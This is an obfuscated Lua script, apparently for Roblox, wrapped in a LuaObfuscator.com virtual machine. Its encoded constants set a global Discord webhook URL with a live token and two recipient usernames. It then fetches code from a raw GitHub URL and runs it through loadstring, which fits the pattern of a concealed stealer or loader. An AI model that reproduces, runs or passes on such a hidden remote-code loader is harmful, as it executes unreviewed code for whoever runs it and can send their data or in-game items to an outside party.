--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v89=v5(v82,v19);v19=nil;return v89;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 -(0 -0))) then v84=(v31/(2^(v32-(1 -0))))%((4 -(1639 -(1523 + 114)))^(((v33-1) -(v32-(620 -(555 + 64)))) + (932 -(771 + 86 + 74)))) ;return v84-(v84%((1634 -(68 + 997)) -(367 + 201))) ;end end else local v85=927 -((1484 -(226 + 1044)) + 713) ;local v86;while true do if ((0 + 0)==v85) then v86=2^(v32-1) ;return (((v31%(v86 + v86))>=v86) and (1 + 0)) or (877 -(282 + 595)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=957 -(892 + 65) ;local v36;local v37;while true do if (v35==(2 -1)) then return (v37 * (1114 -858)) + v36 ;end if (v35==((297 -(67 + 113)) -(32 + 85))) then v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;v35=1 + 0 ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + 3 + 1 ;return (v41 * (41190819 -24413603)) + (v40 * (48199 + 17337)) + (v39 * (1017 -761)) + v38 ;end local function v24()local v42=0;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(953 -(255 + 547 + 150))) then v45=2 -1 ;v46=(v20(v44,1 -0 ,15 + 5 ) * ((999 -(750 + 165 + 82))^((862 -(201 + 571)) -58))) + v43 ;v42=2 + 0 ;end if ((0 -0)==v42) then v43=v23();v44=v23();v42=1188 -((2207 -(116 + 1022)) + 118) ;end if (v42==(4 -2)) then v47=v20(v44,45 -24 ,6 + 25 );v48=((v20(v44,56 -(99 -75) )==(1 + 0)) and  -(792 -(368 + 423))) or 1 ;v42=9 -(4 + 2) ;end if (v42==(21 -(10 + 8))) then if (v47==0) then if (v46==0) then return v48 * (0 -0) ;else local v99=0;while true do if (v99==((1613 -1171) -(416 + 26))) then v47=3 -2 ;v45=0 + 0 ;break;end end end elseif (v47==(3621 -(5589 -4015))) then return ((v46==0) and (v48 * (1/0))) or (v48 * NaN) ;end return v8(v48,v47-(1461 -(145 + 293)) ) * (v45 + (v46/((432 -(44 + 386))^(1538 -(998 + 488))))) ;end end end local function v25(v49)local v50=859 -(814 + 45) ;local v51;local v52;while true do if (v50==(2 -1)) then v51=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;v50=(3 -2) + 1 ;end if (v50==((4 -3) + 1)) then v52={};for v90=886 -(261 + 624) , #v51 do v52[v90]=v2(v1(v3(v51,v90,v90)));end v50=4 -1 ;end if (v50==((427 + 656) -(1020 + 60))) then return v6(v52);end if (v50==(1423 -(630 + 793))) then v51=nil;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=1;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 -0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53~=2) then else v58=nil;v59=nil;v53=8 -5 ;end if ((288 -(134 + 151))~=v53) then else v60=nil;while true do local v92=1665 -(970 + 695) ;while true do if ((1 -0)~=v92) then else if (v54==2) then for v102=1,v23() do local v103=1990 -(582 + 1408) ;local v104;local v105;local v106;while true do if ((0 -0)~=v103) then else v104=0 -0 ;v105=nil;v103=3 -2 ;end if (v103==(1825 -(1195 + 629))) then v106=nil;while true do if (v104==0) then local v155=0;while true do if (v155==1) then v104=1 -0 ;break;end if (v155==(241 -(187 + 54))) then v105=780 -(162 + 618) ;v106=nil;v155=1;end end end if (v104==1) then while true do if ((0 + 0)~=v105) then else v106=v21();if (v20(v106,1 + 0 ,1 -0 )~=0) then else local v174=0 -0 ;local v175;local v176;local v177;local v178;local v179;while true do if (v174==1) then v177=nil;v178=nil;v174=2;end if (v174~=(0 + 0)) then else v175=1636 -(1373 + 263) ;v176=nil;v174=1001 -(451 + 549) ;end if (v174==2) then v179=nil;while true do if (v175~=2) then else while true do if (v176~=(1 + 0)) then else local v187=0 -0 ;while true do if (v187==0) then local v198=0 -0 ;while true do if (v198~=(1384 -(746 + 638))) then else v179={v22(),v22(),nil,nil};if (v177==(1581 -(1535 + 46))) then local v200=0 + 0 ;local v201;while true do if (v200==(0 + 0)) then v201=560 -(306 + 254) ;while true do if (0==v201) then v179[1 + 2 ]=v22();v179[7 -3 ]=v22();break;end end break;end end elseif (v177==1) then v179[3]=v23();elseif (v177==(1469 -(899 + 568))) then v179[3]=v23() -((2 + 0)^(38 -22)) ;elseif (v177~=(606 -(268 + 335))) then else local v206=290 -(60 + 230) ;local v207;while true do if (v206~=(572 -(426 + 146))) then else v207=0 + 0 ;while true do if (v207~=0) then else v179[3]=v23() -((1458 -(282 + 1174))^(827 -(569 + 242))) ;v179[4]=v22();break;end end break;end end end v198=1;end if (v198~=1) then else v187=1;break;end end end if (v187==1) then v176=5 -3 ;break;end end end if (v176==(1 + 2)) then if (v20(v178,1027 -(706 + 318) ,3)~=(1252 -(721 + 530))) then else v179[4]=v60[v179[4]];end v55[v102]=v179;break;end if (v176~=(1273 -(945 + 326))) then else if (v20(v178,2 -1 ,1)==1) then v179[2]=v60[v179[2]];end if (v20(v178,2 + 0 ,702 -(271 + 429) )==1) then v179[3 + 0 ]=v60[v179[1503 -(1408 + 92) ]];end v176=3;end if ((1086 -(461 + 625))==v176) then local v189=0;while true do if (v189~=1) then else v176=1;break;end if (v189==0) then v177=v20(v106,1290 -(993 + 295) ,1 + 2 );v178=v20(v106,4,1177 -(418 + 753) );v189=1;end end end end break;end if (v175==1) then v178=nil;v179=nil;v175=2;end if (v175==0) then local v186=0;while true do if (v186==(1 + 0)) then v175=1 + 0 ;break;end if (v186~=0) then else v176=0 + 0 ;v177=nil;v186=1;end end end end break;end end end break;end end break;end end break;end end end for v107=1,v23() do v56[v107-(1 + 0) ]=v28();end return v58;end break;end if (v92~=0) then else if (v54~=0) then else local v100=529 -(406 + 123) ;while true do if (v100~=2) then else v54=1;break;end if (v100==0) then v55={};v56={};v100=1770 -(1749 + 20) ;end if (1==v100) then v57={};v58={v55,v56,nil,v57};v100=2;end end end if (1~=v54) then else local v101=0 + 0 ;while true do if (v101==2) then v54=2;break;end if (1==v101) then for v110=1146 -(466 + 679) ,v59 do local v111=0 -0 ;local v112;local v113;local v114;local v115;while true do if ((0 -0)~=v111) then else v112=1900 -(106 + 1794) ;v113=nil;v111=1 + 0 ;end if ((1 + 1)==v111) then while true do if (v112==(0 -0)) then local v170=0 -0 ;local v171;while true do if (v170==0) then v171=114 -(4 + 110) ;while true do if (v171==0) then v113=0;v114=nil;v171=585 -(57 + 527) ;end if (v171==1) then v112=1;break;end end break;end end end if (v112==1) then v115=nil;while true do if (v113~=(1428 -(41 + 1386))) then else if (v114==1) then v115=v21()~=0 ;elseif (v114==(105 -(17 + 86))) then v115=v24();elseif (v114==(3 + 0)) then v115=v25();end v60[v110]=v115;break;end if (v113~=0) then else local v181=0;local v182;local v183;while true do if (v181==0) then v182=0;v183=nil;v181=1;end if (v181==(1 -0)) then while true do if (v182~=(0 -0)) then else v183=0;while true do if (v183==(167 -(122 + 44))) then v113=1 -0 ;break;end if (v183==0) then local v190=0;local v191;while true do if (v190==0) then v191=0 -0 ;while true do if (v191==1) then v183=1 + 0 ;break;end if (v191==0) then local v199=0;while true do if (v199==0) then v114=v21();v115=nil;v199=1 + 0 ;end if (v199==(1 -0)) then v191=66 -(30 + 35) ;break;end end end end break;end end end end break;end end break;end end end end break;end end break;end if (v111~=1) then else v114=nil;v115=nil;v111=2 + 0 ;end end end v58[1260 -(1043 + 214) ]=v21();v101=7 -5 ;end if ((1212 -(323 + 889))==v101) then v59=v23();v60={};v101=1;end end end v92=2 -1 ;end end end break;end if (v53~=(581 -(361 + 219))) then else v56=nil;v57=nil;v53=2;end if (v53==(320 -(53 + 267))) then v54=0 + 0 ;v55=nil;v53=1;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v87=0,v75 do if (v87>=v69) then v73[v87-v69 ]=v74[v87 + 1 ];else v77[v87]=v74[v87 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v88=0;while true do if (v88==1) then if (v80<=10) then if (v80<=4) then if (v80<=1) then if (v80>0) then v77[v79[2]][v79[3]]=v79[4];else v77[v79[2]]=v63[v79[3]];end elseif (v80<=2) then local v120=0;local v121;while true do if (v120==0) then v121=v79[2];v77[v121]=v77[v121](v13(v77,v121 + 1 ,v72));break;end end elseif (v80>3) then v77[v79[2]]=v79[3]~=0 ;else v71=v79[3];end elseif (v80<=7) then if (v80<=5) then local v122=v79[2];local v123=v77[v79[3]];v77[v122 + 1 ]=v123;v77[v122]=v123[v79[4]];elseif (v80==6) then do return;end else v77[v79[2]][v79[3]]=v79[4];end elseif (v80<=8) then v77[v79[2]]();elseif (v80>9) then local v143=0;local v144;local v145;while true do if (v143==1) then v77[v144 + 1 ]=v145;v77[v144]=v145[v79[4]];break;end if (v143==0) then v144=v79[2];v145=v77[v79[3]];v143=1;end end else v77[v79[2]]=v79[3]~=0 ;end elseif (v80<=15) then if (v80<=12) then if (v80==11) then v77[v79[2]]=v63[v79[3]];else v77[v79[2]]();end elseif (v80<=13) then v77[v79[2]]=v79[3];elseif (v80>14) then v71=v79[3];elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80<=18) then if (v80<=16) then v77[v79[2]]=v79[3];elseif (v80>17) then local v148=0;local v149;while true do if (v148==0) then v149=v79[2];v77[v149]=v77[v149](v13(v77,v149 + 1 ,v72));break;end end elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80<=19) then local v133=v79[2];local v134,v135=v70(v77[v133](v13(v77,v133 + 1 ,v79[3])));v72=(v135 + v133) -1 ;local v136=0;for v137=v133,v72 do local v138=0;while true do if (v138==0) then v136=v136 + 1 ;v77[v137]=v134[v136];break;end end end elseif (v80==20) then local v150=0;local v151;local v152;local v153;local v154;while true do if (v150==2) then for v172=v151,v72 do local v173=0;while true do if (v173==0) then v154=v154 + 1 ;v77[v172]=v152[v154];break;end end end break;end if (v150==1) then v72=(v153 + v151) -1 ;v154=0;v150=2;end if (v150==0) then v151=v79[2];v152,v153=v70(v77[v151](v13(v77,v151 + 1 ,v79[3])));v150=1;end end else do return;end end v71=v71 + 1 ;break;end if (v88==0) then v79=v67[v71];v80=v79[1];v88=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O31383738393035392O37393736303230382F7456614C2O73634B334533704372527976706E4E6433545973464854556E4C4A4D595A30343372504E546757636C496B70655152656A4F6650324F71515A4174524F4544030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030B3O007261696B656E706F67693203093O00557365724E616D653200173O0012103O00013O00260E3O000E000100020004033O000E000100120B000100033O00300100010004000500120B000100063O00120B000200073O00200A000200020008001210000400094O0009000500014O0014000200054O000200013O00022O000C0001000100010004033O0016000100260E3O0001000100010004033O0001000100120B000100033O0030010001000A000B00120B000100033O0030010001000C000B0012103O00023O0004033O000100012O00153O00017O00",v9(),...);end
